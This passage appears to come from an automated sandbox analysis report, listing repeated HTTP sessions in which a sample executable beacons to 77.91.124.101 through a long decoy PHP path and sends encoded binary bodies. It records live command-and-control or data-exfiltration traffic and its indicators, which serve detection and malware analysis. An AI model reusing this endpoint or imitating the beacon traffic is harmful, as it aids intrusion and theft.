Nov 21, 2023 04:48:00.338649988 CET	365	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.5	49763	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:59.960717916 CET	364	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:00.159409046 CET	364	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:00.338649988 CET	365	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49717	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:29.580786943 CET	162	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:29.778557062 CET	163	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:29.778968096 CET	165	OUT	Data Raw: 52 5c 5d 5d 5b 59 5f 5e 5d 57 55 57 55 5c 57 57 50 5d 58 49 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\]][Y_^]WUWU\WWP]XIVPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>=((%= ;Z,4[75])0%0=2031.8>>,7,&G''^)/
Nov 21, 2023 04:47:29.983077049 CET	165	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	77.91.124.101	80	192.168.2.5	49717	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:29.580786943 CET	162	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:29.778557062 CET	163	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:29.778968096 CET	165	OUT	Data Raw: 52 5c 5d 5d 5b 59 5f 5e 5d 57 55 57 55 5c 57 57 50 5d 58 49 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\]][Y_^]WUWU\WWP]XIVPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>=((%= ;Z,4[75])0%0=2031.8>>,7,&G''^)/
Nov 21, 2023 04:47:29.983077049 CET	165	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	77.91.124.101	80	192.168.2.5	49764	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:00.333837032 CET	365	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:00.531379938 CET	366	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:00.531569958 CET	367	OUT	Data Raw: 52 5d 58 5c 5b 53 5f 5b 5d 57 55 57 55 58 57 5a 50 52 58 45 56 50 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]X\[S_[]WUWUXWZPRXEVPW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'])+5X<;=U$,$^#1?>P0&W'0-]:<,/&G''^)?
Nov 21, 2023 04:48:00.733994961 CET	371	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:00 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 02 27 3f 38 10 21 33 34 0b 2b 3a 2d 50 2e 3d 3e 43 3f 0a 21 13 25 2e 28 5e 27 07 04 0d 3c 3f 02 5d 27 29 0d 0e 21 26 2b 00 29 30 21 5a 0c 1d 26 5e 36 3b 3b 57 3c 2e 3f 02 29 3d 2c 5b 31 32 24 06 3f 3d 3f 50 34 23 3b 5b 24 30 20 1b 2c 59 29 59 2e 16 0c 09 27 2c 0b 07 22 2d 23 5f 0c 14 24 0c 22 31 27 5b 37 30 39 08 36 24 37 04 23 37 37 1c 27 2e 23 08 32 38 3e 07 3f 28 0a 55 25 51 20 50 33 2a 2f 53 32 39 23 1e 29 3a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !'?8!34+:-P.=>C?!%.(^'<?]')!&+)0!Z&^6;;W<.?)=,[12$?=?P4#;[$0 ,Y)Y.',"-#_$"1'[7096$7#77'.#28>?(U%Q P3/S29#):&T+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.5	49764	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:00.333837032 CET	365	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:00.531379938 CET	366	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:00.531569958 CET	367	OUT	Data Raw: 52 5d 58 5c 5b 53 5f 5b 5d 57 55 57 55 58 57 5a 50 52 58 45 56 50 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]X\[S_[]WUWUXWZPRXEVPW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'])+5X<;=U$,$^#1?>P0&W'0-]:<,/&G''^)?
Nov 21, 2023 04:48:00.733994961 CET	371	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:00 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 02 27 3f 38 10 21 33 34 0b 2b 3a 2d 50 2e 3d 3e 43 3f 0a 21 13 25 2e 28 5e 27 07 04 0d 3c 3f 02 5d 27 29 0d 0e 21 26 2b 00 29 30 21 5a 0c 1d 26 5e 36 3b 3b 57 3c 2e 3f 02 29 3d 2c 5b 31 32 24 06 3f 3d 3f 50 34 23 3b 5b 24 30 20 1b 2c 59 29 59 2e 16 0c 09 27 2c 0b 07 22 2d 23 5f 0c 14 24 0c 22 31 27 5b 37 30 39 08 36 24 37 04 23 37 37 1c 27 2e 23 08 32 38 3e 07 3f 28 0a 55 25 51 20 50 33 2a 2f 53 32 39 23 1e 29 3a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !'?8!34+:-P.=>C?!%.(^'<?]')!&+)0!Z&^6;;W<.?)=,[12$?=?P4#;[$0 ,Y)Y.',"-#_$"1'[7096$7#77'.#28>?(U%Q P3/S29#):&T+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	77.91.124.101	80	192.168.2.5	49765	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:00.456012964 CET	366	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:00.658432961 CET	368	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:00.658720016 CET	370	OUT	Data Raw: 57 5f 58 58 5b 5e 5a 50 5d 57 55 57 55 5c 57 50 50 5b 58 43 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_XX[^ZP]WUWU\WPP[XCVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8<+==U<;7%#:5\<3=%$!.;?/Y8&G''^)/
Nov 21, 2023 04:48:00.863715887 CET	371	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.5	49765	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:00.456012964 CET	366	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:00.658432961 CET	368	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:00.658720016 CET	370	OUT	Data Raw: 57 5f 58 58 5b 5e 5a 50 5d 57 55 57 55 5c 57 50 50 5b 58 43 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_XX[^ZP]WUWU\WPP[XCVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8<+==U<;7%#:5\<3=%$!.;?/Y8&G''^)/
Nov 21, 2023 04:48:00.863715887 CET	371	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.5	49766	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:01.192553997 CET	372	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:01.389041901 CET	372	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:01.389336109 CET	375	OUT	Data Raw: 57 5c 5d 5e 5b 5b 5a 5a 5d 57 55 57 55 5d 57 52 50 58 58 46 56 50 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\]^[[ZZ]WUWU]WRPXXFVPW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X)(-^<8"W># /4(#>Q&=!'#=9("\<,8>&G''^)+
Nov 21, 2023 04:48:01.590692997 CET	375	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	77.91.124.101	80	192.168.2.5	49766	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:01.192553997 CET	372	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:01.389041901 CET	372	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:01.389336109 CET	375	OUT	Data Raw: 57 5c 5d 5e 5b 5b 5a 5a 5d 57 55 57 55 5d 57 52 50 58 58 46 56 50 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\]^[[ZZ]WUWU]WRPXXFVPW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X)(-^<8"W># /4(#>Q&=!'#=9("\<,8>&G''^)+
Nov 21, 2023 04:48:01.590692997 CET	375	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	77.91.124.101	80	192.168.2.5	49767	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:01.912075996 CET	376	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:02.110807896 CET	376	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:02.111066103 CET	378	OUT	Data Raw: 52 5b 58 5c 5b 59 5a 59 5d 57 55 57 55 5c 57 51 50 5e 58 49 56 50 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[X\[YZY]WUWU\WQP^XIVPW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(1<(2T3<,:#)](6R3>"P$0."<;\/&G''^)/
Nov 21, 2023 04:48:02.314310074 CET	379	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.5	49767	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:01.912075996 CET	376	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:02.110807896 CET	376	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:02.111066103 CET	378	OUT	Data Raw: 52 5b 58 5c 5b 59 5a 59 5d 57 55 57 55 5c 57 51 50 5e 58 49 56 50 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[X\[YZY]WUWU\WQP^XIVPW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(1<(2T3<,:#)](6R3>"P$0."<;\/&G''^)/
Nov 21, 2023 04:48:02.314310074 CET	379	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.5	49768	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:02.628360987 CET	380	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:02.826001883 CET	380	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:02.826369047 CET	382	OUT	Data Raw: 57 5a 5d 5c 5e 5d 5a 5f 5d 57 55 57 55 5d 57 56 50 5a 58 44 56 57 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WZ]\^]Z_]WUWU]WVPZXDVWW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+!Y=+= 'Z;&[")&?&3V$.V:?/(->&G''^)+
Nov 21, 2023 04:48:03.029112101 CET	383	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	77.91.124.101	80	192.168.2.5	49768	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:02.628360987 CET	380	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:02.826001883 CET	380	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:02.826369047 CET	382	OUT	Data Raw: 57 5a 5d 5c 5e 5d 5a 5f 5d 57 55 57 55 5d 57 56 50 5a 58 44 56 57 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WZ]\^]Z_]WUWU]WVPZXDVWW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+!Y=+= 'Z;&[")&?&3V$.V:?/(->&G''^)+
Nov 21, 2023 04:48:03.029112101 CET	383	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	77.91.124.101	80	192.168.2.5	49769	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:03.347954988 CET	384	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:03.546896935 CET	384	IN	HTTP/1.1 100 Continue
